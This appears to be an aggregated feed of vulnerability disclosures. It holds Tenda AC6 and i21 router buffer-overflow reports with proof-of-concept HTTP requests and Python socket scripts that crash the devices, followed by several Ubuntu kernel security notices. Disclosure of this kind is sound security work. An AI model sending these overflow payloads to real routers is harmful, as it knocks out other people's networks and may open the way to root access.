Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk\_crypto parameter in the fromSetWirelessRepeat function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/WifiExtraSet page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/WifiExtraSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 247
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

CVE-2022-45659: CVE-vulns/fromSetWirelessRepeat.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function.

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/fast_setting_wifi_set request.

This vulnerability lies in the /goform/fast_setting_wifi_set page，The details are shown below:

This POC can result in a Dos.

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 1391
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-45654: CVE-vulns/form_fast_setting_wifi_set_ssid.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setUplinkInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto\_ping\_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'upLinkEn=true&pingHostIp1=' + p1

p3 \= b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44367: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setDiagnoseInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setDiagnoseInfo, a value of 0x50 is created, which will use strcpy to give the value after cmd + 5 to the heap. It is worth noting that the size is not checked, resulting in a heap overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'cmd=' + p1

p3 \= b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44366: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setSnmpInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSnmpInfo, snmpEn is controlled by the user and will finally be spliced into parm by sprintf. It is worth noting that the stack overflow is caused by not checking the size

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'snmpEn=' + p1

p3 \= b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44363: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib\_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'op=add&logip=' + p1

p3 \= b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44362: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Ubuntu Security Notice 5755-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5755-1December 01, 2022linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gkeop, linux-hwe-5.15,linux-ibm, linux-intel-iotg, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-oracle, linux-oracle-5.15, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the NFSD implementation in the Linux kernel did notproperly handle some RPC messages, leading to a buffer overflow. A remoteattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-43945)Jann Horn discovered that the Linux kernel did not properly track memoryallocations for anonymous VMA mappings in some situations, leading topotential data structure reuse. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2022-42703)It was discovered that a memory leak existed in the IPv6 implementation ofthe Linux kernel. A local attacker could use this to cause a denial ofservice (memory exhaustion). (CVE-2022-3524)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-3564)It was discovered that the ISDN implementation of the Linux kernelcontained a use-after-free vulnerability. A privileged user could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2022-3565)It was discovered that the TCP implementation in the Linux kernel containeda data race condition. An attacker could possibly use this to causeundesired behaviors. (CVE-2022-3566)It was discovered that the IPv6 implementation in the Linux kernelcontained a data race condition. An attacker could possibly use this tocause undesired behaviors. (CVE-2022-3567)It was discovered that the Realtek RTL8152 USB Ethernet adapter driver inthe Linux kernel did not properly handle certain error conditions. A localattacker with physical access could plug in a specially crafted USB deviceto cause a denial of service (memory exhaustion). (CVE-2022-3594)It was discovered that a null pointer dereference existed in the NILFS2file system implementation in the Linux kernel. A local attacker could usethis to cause a denial of service (system crash). (CVE-2022-3621)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1011-gkeop   5.15.0-1011.15   linux-image-5.15.0-1021-ibm     5.15.0-1021.24   linux-image-5.15.0-1021-intel-iotg  5.15.0-1021.26   linux-image-5.15.0-1021-raspi   5.15.0-1021.23   linux-image-5.15.0-1021-raspi-nolpae  5.15.0-1021.23   linux-image-5.15.0-1024-kvm     5.15.0-1024.29   linux-image-5.15.0-1025-gcp     5.15.0-1025.32   linux-image-5.15.0-1025-oracle  5.15.0-1025.31   linux-image-5.15.0-1026-aws     5.15.0-1026.30   linux-image-5.15.0-56-generic   5.15.0-56.62   linux-image-5.15.0-56-generic-64k  5.15.0-56.62   linux-image-5.15.0-56-generic-lpae  5.15.0-56.62   linux-image-5.15.0-56-lowlatency  5.15.0-56.62   linux-image-5.15.0-56-lowlatency-64k  5.15.0-56.62   linux-image-aws                 5.15.0.1026.24   linux-image-aws-lts-22.04       5.15.0.1026.24   linux-image-gcp                 5.15.0.1025.20   linux-image-generic             5.15.0.56.54   linux-image-generic-64k         5.15.0.56.54   linux-image-generic-64k-hwe-22.04  5.15.0.56.54   linux-image-generic-hwe-22.04   5.15.0.56.54   linux-image-generic-lpae        5.15.0.56.54   linux-image-generic-lpae-hwe-22.04  5.15.0.56.54   linux-image-gkeop               5.15.0.1011.10   linux-image-gkeop-5.15          5.15.0.1011.10   linux-image-ibm                 5.15.0.1021.17   linux-image-intel-iotg          5.15.0.1021.20   linux-image-kvm                 5.15.0.1024.22   linux-image-lowlatency          5.15.0.56.49   linux-image-lowlatency-64k      5.15.0.56.49   linux-image-lowlatency-64k-hwe-22.04  5.15.0.56.49   linux-image-lowlatency-hwe-22.04  5.15.0.56.49   linux-image-oracle              5.15.0.1025.20   linux-image-raspi               5.15.0.1021.18   linux-image-raspi-nolpae        5.15.0.1021.18   linux-image-virtual             5.15.0.56.54   linux-image-virtual-hwe-22.04   5.15.0.56.54Ubuntu 20.04 LTS:   linux-image-5.15.0-1025-oracle  5.15.0-1025.31~20.04.2   linux-image-5.15.0-1026-aws     5.15.0-1026.30~20.04.2   linux-image-5.15.0-56-generic   5.15.0-56.62~20.04.1   linux-image-5.15.0-56-generic-64k  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-generic-lpae  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-lowlatency  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-lowlatency-64k  5.15.0-56.62~20.04.1   linux-image-aws                 5.15.0.1026.30~20.04.16   linux-image-generic-64k-hwe-20.04  5.15.0.56.62~20.04.22   linux-image-generic-hwe-20.04   5.15.0.56.62~20.04.22   linux-image-generic-lpae-hwe-20.04  5.15.0.56.62~20.04.22   linux-image-lowlatency-64k-hwe-20.04  5.15.0.56.62~20.04.20   linux-image-lowlatency-hwe-20.04  5.15.0.56.62~20.04.20   linux-image-oracle              5.15.0.1025.31~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.56.62~20.04.22After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5755-1   CVE-2022-3524, CVE-2022-3564, CVE-2022-3565, CVE-2022-3566,   CVE-2022-3567, CVE-2022-3594, CVE-2022-3621, CVE-2022-42703,   CVE-2022-43945Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-56.62   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1026.30   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1025.32   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1011.15   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1021.24   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1021.26   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1024.29   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-56.62   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1025.31   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1021.23   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1026.30~20.04.2   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-56.62~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-56.62~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1025.31~20.04.2

Ubuntu Security Notice USN-5755-1

Ubuntu Security Notice 5754-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a memory leak existed in the IPv6 implementation of the Linux kernel. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5754-1December 01, 2022linux, linux-aws, linux-gcp, linux-ibm, linux-kvm, linux-lowlatency,linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the NFSD implementation in the Linux kernel did notproperly handle some RPC messages, leading to a buffer overflow. A remoteattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-43945)It was discovered that a memory leak existed in the IPv6 implementation ofthe Linux kernel. A local attacker could use this to cause a denial ofservice (memory exhaustion). (CVE-2022-3524)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-3564)It was discovered that the ISDN implementation of the Linux kernelcontained a use-after-free vulnerability. A privileged user could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2022-3565)It was discovered that the TCP implementation in the Linux kernel containeda data race condition. An attacker could possibly use this to causeundesired behaviors. (CVE-2022-3566)It was discovered that the IPv6 implementation in the Linux kernelcontained a data race condition. An attacker could possibly use this tocause undesired behaviors. (CVE-2022-3567)It was discovered that the Realtek RTL8152 USB Ethernet adapter driver inthe Linux kernel did not properly handle certain error conditions. A localattacker with physical access could plug in a specially crafted USB deviceto cause a denial of service (memory exhaustion). (CVE-2022-3594)It was discovered that a null pointer dereference existed in the NILFS2file system implementation in the Linux kernel. A local attacker could usethis to cause a denial of service (system crash). (CVE-2022-3621)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   linux-image-5.19.0-1009-raspi   5.19.0-1009.16   linux-image-5.19.0-1009-raspi-nolpae  5.19.0-1009.16   linux-image-5.19.0-1012-lowlatency  5.19.0-1012.13   linux-image-5.19.0-1012-lowlatency-64k  5.19.0-1012.13   linux-image-5.19.0-1013-gcp     5.19.0-1013.14   linux-image-5.19.0-1013-ibm     5.19.0-1013.14   linux-image-5.19.0-1013-kvm     5.19.0-1013.14   linux-image-5.19.0-1013-oracle  5.19.0-1013.14   linux-image-5.19.0-1014-aws     5.19.0-1014.15   linux-image-5.19.0-26-generic   5.19.0-26.27   linux-image-5.19.0-26-generic-64k  5.19.0-26.27   linux-image-5.19.0-26-generic-lpae  5.19.0-26.27   linux-image-aws                 5.19.0.1014.11   linux-image-gcp                 5.19.0.1013.10   linux-image-generic             5.19.0.26.23   linux-image-generic-64k         5.19.0.26.23   linux-image-generic-lpae        5.19.0.26.23   linux-image-ibm                 5.19.0.1013.10   linux-image-kvm                 5.19.0.1013.10   linux-image-lowlatency          5.19.0.1012.9   linux-image-lowlatency-64k      5.19.0.1012.9   linux-image-oracle              5.19.0.1013.10   linux-image-raspi               5.19.0.1009.8   linux-image-raspi-nolpae        5.19.0.1009.8   linux-image-virtual             5.19.0.26.23After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5754-1   CVE-2022-3524, CVE-2022-3564, CVE-2022-3565, CVE-2022-3566,   CVE-2022-3567, CVE-2022-3594, CVE-2022-3621, CVE-2022-43945Package Information:   https://launchpad.net/ubuntu/+source/linux/5.19.0-26.27   https://launchpad.net/ubuntu/+source/linux-aws/5.19.0-1014.15   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1013.14   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1013.14   https://launchpad.net/ubuntu/+source/linux-kvm/5.19.0-1013.14   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.19.0-1012.13   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1013.14   https://launchpad.net/ubuntu/+source/linux-raspi/5.19.0-1009.16

Ubuntu Security Notice USN-5754-1

Ubuntu Security Notice 5752-1 - David Bouman and Billy Jheng Bing Jhong discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Soenke Huster discovered that an integer overflow vulnerability existed in the WiFi driver stack in the Linux kernel, leading to a buffer overflow. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5752-1  
November 30, 2022

linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems

Details:

David Bouman and Billy Jheng Bing Jhong discovered that a race condition  
existed in the io_uring subsystem in the Linux kernel, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-2602)

Sönke Huster discovered that an integer overflow vulnerability existed in  
the WiFi driver stack in the Linux kernel, leading to a buffer overflow. A  
physically proximate attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-41674)

Sönke Huster discovered that a use-after-free vulnerability existed in the  
WiFi driver stack in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-42719)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly perform reference counting in some situations, leading to a  
use-after-free vulnerability. A physically proximate attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-42720)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel did  
not properly handle BSSID/SSID lists in some situations. A physically  
proximate attacker could use this to cause a denial of service (infinite  
loop). (CVE-2022-42721)

Sönke Huster discovered that the WiFi driver stack in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
physically proximate attacker could use this to cause a denial of service  
(system crash). (CVE-2022-42722)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1024-azure-fde  5.15.0-1024.30.1  
   linux-image-azure-fde           5.15.0.1024.30.5

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5752-1  
   CVE-2022-2602, CVE-2022-41674, CVE-2022-42719, CVE-2022-42720,  
   CVE-2022-42721, CVE-2022-42722

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1024.30.1

Ubuntu Security Notice USN-5752-1

Tenda Tenda AC6V1.0 V15.03.05.19 is affected by buffer overflow. Causes a denial of service (local).

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/WifiBasicSet page，While processing the security parameters for a post request, the value is directly strcpy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow. The details are shown below:

**POC**

This PoC can result in a Dos.

Tag

#buffer_overflow